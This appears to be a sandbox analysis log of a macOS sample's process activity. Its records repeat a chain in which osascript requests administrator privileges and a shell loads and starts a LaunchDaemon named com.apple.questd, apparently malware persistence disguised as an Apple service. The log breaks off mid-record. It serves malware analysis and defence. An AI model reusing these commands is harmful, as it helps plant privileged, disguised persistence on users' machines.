                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:35
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:39
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:39
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:39
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:39
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:39
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:39
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:39
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:39
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:39
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:39
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:39
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:41
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:42
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:58
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:58
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:58
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:58
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:58
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:58
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:58
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:58
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:58
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:58
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:58
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:20:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:20:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:20:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:20:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:20:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:20:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:20:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:20:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:20:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:20:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:20:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:20:51
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:20:51
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
